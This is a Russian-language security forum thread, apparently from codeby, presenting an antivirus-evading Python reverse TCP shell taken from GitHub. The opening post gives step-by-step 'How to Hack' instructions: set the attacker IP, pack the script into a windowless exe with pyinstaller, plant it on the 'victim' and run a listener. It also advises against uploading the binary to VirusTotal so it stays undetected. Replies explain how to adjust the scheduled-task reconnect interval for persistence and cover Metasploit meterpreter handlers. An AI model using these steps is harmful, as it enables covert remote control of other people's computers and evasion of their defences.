• Напоминаем, что 1 марта стартует курс "Тестирование Веб-Приложений на проникновение" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, активный фаззинг, уязвимости, пост-эксплуатация, инструментальные средства, Social Engeneering и многое другое. Подробнее ...

Статья Обход антивируса (Reverse Python Shell) 100% FUD

<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)

Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)

Состоит наш бэкдор опять же таки из двух частей:

Серверная часть
:
  • reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы
  • может быть упакован в "exe" файл используя pyinstaller
На windows машине , выполните команду:
Код:
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.py
для упаковки в бинарный файл.

listener.js
Простенький мультиклиентный листенер написанный на javascript(node.js)
Команды:
help
exit --- выйти из listener
list --- посмотреть список жертв
connect num --- подкючится к одной жертве
например 'connect 0' подключимся к жертве которая имеет идентификатор 0 в списке
schedule n_minutes --- Планировщик задач|schedule attack(только для Windows only), принудительно указать время каждого конекта к атакуемой машине через определенный интервал в минутах

Качаем:

Код:
git clone https://github.com/shd101wyy/Python_Reverse_TCP.git


How to Hack (для Windows)
1)Меняем переменную attacker_ip в reverse_tcp.py на ip address атакуещего.



2)Запускаем команду pyinstaller --noconsole --onefile reverse_tcp.py создаем reverse_tcp.exe



3)Парим бинарник жертве
4)Запускаем листенер командой nodejs listener.js и ждем конекта жертвы.





 
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
schedule n_minutes --- Планировщик задач|schedule attack(только для Windows only), принудительно указать время каждого конекта к атакуемой машине через определенный интервал в минутах
скажи, пожалуйста, этот параметр нужно указывать в скрипте, или уже после того как получил сессию?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
скажи, пожалуйста, этот параметр нужно указывать в скрипте, или уже после того как получил сессию?
Это команда непосредственно в консоли управления (после запуска nodejs listener.js и когда жертва заразилась) задает интервал каждого последующего подключения.
По умолчанию при запусуке вредоноса жертва будет подкючаться к тебе каждые 30 минут,так как это прописано в скрипте самом.Поэтому можно подредактировать скрипт под себя и опционально указать дефолтный интервал времени в reverse_tcp.py
В даном случае поищи функцию функцию generateSheduleTask()
В твоем случае просто можешь изменить в скрипте
Код:
xml.write(generateScheduleTask(30))
На
Код:
xml.write(generateScheduleTask(Нужный_Интервал_В_Минутах))
 
  • Нравится
Реакции: gushmazuko и MAdDog719
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
Это команда непосредственно в консоли управления (после запуска nodejs listener.js и когда жертва заразилась) задает интервал каждого последующего подключения.
По умолчанию при запусуке вредоноса жертва будет подкючаться к тебе каждые 30 минут,так как это прописано в скрипте самом.Поэтому можно подредактировать скрипт под себя и опционально указать дефолтный интервал времени в reverse_tcp.py
В даном случае поищи функцию функцию generateSheduleTask()
В твоем случае просто можешь изменить в скрипте

Код:
xml.write(generateScheduleTask(30))
На
Код:
xml.write(generateScheduleTask(Нужный_Интервал_В_Минутах))
Понял, спасибо)
 
  • Нравится
Реакции: <~DarkNode~>
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
чет не работает




 
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
я так понял ошибка потому что не установлен PyCrypto, но при установке возникает новая ошибка



пока не знаю как побороть проблему
 
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
решил проблему установив Python 2.7 =)
 
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
При попытке получить сессию через msfconsole, вылетает ошибка на стороне жертвы
 
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
Подскажите в какой процес оно прячется?? Каждые 30 мин вылетает ошибка такая как на скрине 3. Уже и перезагружался не помогает.
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Ошибка вылетает потому что листенер не запущен на стороне атакуещего...


А посмотреть и удалить процес можно в планировщике заданий
Выполнить команду на виндоус машине:
Пуск--->Выполнить--->taskschd.msc


 
  • Нравится
Реакции: valerian38 и MAdDog719
MAdDog719

MAdDog719

Well-known member
16.08.2016
110
27
Метасплоит же не нужен тут...


для этого есть listener.js
как бы да, но по моему у метасплоит куда больше возможностей, нежели у listener.js, хотя может я не разобрался как с ним работать, но пока могу только лазать по папкам жертвы, возможно есть способ залить через него какой то бекдор?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Легко)
как бы да, но по моему у метасплоит куда больше возможностей, нежели у listener.js, хотя может я не разобрался как с ним работать, но пока могу только лазать по папкам жертвы, возможно есть способ залить через него какой то бекдор?
Вот написал как это очень легко делаться.
Получить метерпретер сессию
 
  • Нравится
Реакции: The Codeby и MAdDog719
D

Drupa

Инструмент хороший, все очень легко настроилось, без всяких проблем. вот только не пойму чачем такой сложный процесс перехвата нельзя ли просто
exploit/multi/handler
payload windows/meterpreter/reverse_tcp
и все ?!

не каким образом нет нормально соединения к meterpreter засисает подключении и больше рукопожатие не происходит
как на скриншоте, значит только через listener.js возможно пользоваться
 

Вложения

  • 32,2 КБ Просмотры: 370
Последнее редактирование модератором:
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 019
Инструмент хороший, все очень легко настроилось, без всяких проблем. вот только не пойму чачем такой сложный процесс перехвата нельзя ли просто
exploit/multi/handler
payload windows/meterpreter/reverse_tcp
и все ?!

не каким образом нет нормально соединения к meterpreter засисает подключении и больше рукопожатие не происходит
как на скриншоте, значит только через listener.js возможно пользоваться
Попробуй другой пейлоад:
Снимок.PNG
 
D

Drupa

Попробовал конект происходит и тут же отключается как видно на скришноше. Что можно придумать ?

ошибку я понял так : дисконект происходит потому, что exe отличается шифрованием поэтому этот пайлоад не может с ним работать. Если я не прав или что то не понимаю, прошу поправьте меня пожалуйста
 

Вложения

Последнее редактирование модератором:
F

for(i=0;i<225;i++);

что это он мне пишет??? я не могу понять инструкцию:( я выполняю комаеду---
root@DDoS:~# git clone
Клонирование в «Python_Reverse_TCP»…
fatal: unable to access ' ': Received HTTP code 503 from proxy after CONNECT

Могу ли я упаковать в exe на linux kali машине???
 
Последнее редактирование модератором:
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 536
3 379
Received HTTP code 503 from proxy after CONNECT
Вот Вам же пишет система в чем проблема, не можете настроить связь через ТОР или прокси для всей системы - учите или качайте архивом через кнопку Download через браузер
 
Мы в соцсетях: